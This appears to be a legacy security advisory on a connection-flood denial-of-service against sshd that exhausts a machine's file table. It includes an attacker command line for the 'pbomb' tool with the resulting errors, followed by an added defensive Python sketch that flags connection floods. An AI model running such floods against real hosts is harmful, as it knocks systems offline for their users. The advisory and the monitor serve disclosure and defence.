COMMAND

    ssh

SYSTEMS AFFECTED

    Systems running ssh

PROBLEM

    Jeff Johnson found the following regarding ssh and file descriptors.
    On machines without filehandle-7 applied, or machines that don't
    run sshd out of xinetd with a reasonable (50 process or lower)
    limit, you can make the machine unusable by making many
    simultaneous connections to port 22.  Example:

	badguy:[~]$ ./pbomb exboss.somewhere.net

    After many  connections, attempting  to execute  any command  will
    result in a file table overflow, or other errors (on 2.0.33):

	exboss:[~]$ w
	bash: fork: Try again
	exboss:[~]$ su
	su: File table overflow

    You can't even telnet or ssh in anymore.  This was after 400
    connections.  When the attack is stopped, everything on the box
    returns to normal after a few minutes.  Testing on a FreeBSD 2.2.5
    box showed the following:

	[~]$ telnet 24.xxx.xx.xxx
	Trying 24.xxx.xx.xxx...
	Connected to 24.xxx.xx.xxx.
	Escape character is '^]'.

	FreeBSD (bsd.vnc.xxxxxxxx.xx.xx) (ttyp2)

	login:

	^]^C - Connection closed.

	[~]$ pbomb 24.xxx.xx.xxx
	250 connects counted.
	250 connects counted.
	109 connects counted.

	[switch windows]

    It isn't working, and trying to do anything at the console gives
    the same error:

	Trying 24.xxx.xx.xxx...
	Connected to 24.xxx.xx.xxx.
	Escape character is '^]'.
	telnetd in realloc(): warning: junk pointer, too low to make sense.
	Connection closed by foreign host.

    It seems  that BSDi  2.1-3.1 are  also affected.   Attached is the
    program used to make the connections.

SOLUTION

    Nothing so far.
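
    Added example, not part of the original advisory: a monitoring
    sketch for the condition described under PROBLEM.  It counts
    connections to port 22 in `netstat -tn`-style output and reads
    file-table usage in the Linux /proc/sys/fs/file-nr format.  The
    50-connection ceiling is the advisory's xinetd limit; the per-source
    limit, the 80% warning level and all sample input are assumptions.

```python
from collections import Counter

SSH_PORT = 22
TOTAL_LIMIT = 50       # the advisory's "50 process or lower" xinetd ceiling
PER_SOURCE_LIMIT = 10  # assumed per-client ceiling, not from the advisory
TABLE_WARN = 0.80      # assumed warning level for file-table usage

def ssh_peers(netstat_text, port=SSH_PORT):
    """Count TCP connections to the local ssh port, keyed by remote address."""
    peers = Counter()
    for line in netstat_text.splitlines():
        f = line.split()
        if len(f) < 6 or not f[0].startswith("tcp"):
            continue  # header or non-TCP line
        local, remote, state = f[3], f[4], f[5]
        if local.rsplit(":", 1)[-1] == str(port) and state in ("ESTABLISHED", "SYN_RECV"):
            peers[remote.rsplit(":", 1)[0]] += 1
    return peers

def file_table_usage(file_nr_text):
    """Fraction of the file table in use; fields: allocated, unused, maximum."""
    allocated, unused, maximum = (int(x) for x in file_nr_text.split())
    return (allocated - unused) / maximum

def assess(netstat_text, file_nr_text):
    """Return alert strings for a connection flood against sshd."""
    peers = ssh_peers(netstat_text)
    total = sum(peers.values())
    alerts = []
    if total > TOTAL_LIMIT:
        alerts.append(f"total ssh connections {total} > {TOTAL_LIMIT}")
    for ip, n in sorted(peers.items()):
        if n > PER_SOURCE_LIMIT:
            alerts.append(f"{ip} holds {n} ssh connections")
    usage = file_table_usage(file_nr_text)
    if usage >= TABLE_WARN:
        alerts.append(f"file table {usage:.0%} full")
    return alerts

def sample_netstat():
    """Constructed sample input (documentation addresses, not a real capture)."""
    rows = ["Proto Recv-Q Send-Q Local Address Foreign Address State"]
    rows += [f"tcp 0 0 10.0.0.5:22 192.0.2.10:{40000 + i} ESTABLISHED" for i in range(60)]
    rows += [f"tcp 0 0 10.0.0.5:22 198.51.100.7:{50000 + i} ESTABLISHED" for i in range(2)]
    rows.append("tcp 0 0 10.0.0.5:80 203.0.113.9:51000 ESTABLISHED")
    return "\n".join(rows)

SAMPLE_FILE_NR = "980 0 1024"  # constructed: 980 of 1024 handles in use
if __name__ == "__main__":
    print("\n".join(assess(sample_netstat(), SAMPLE_FILE_NR)))
```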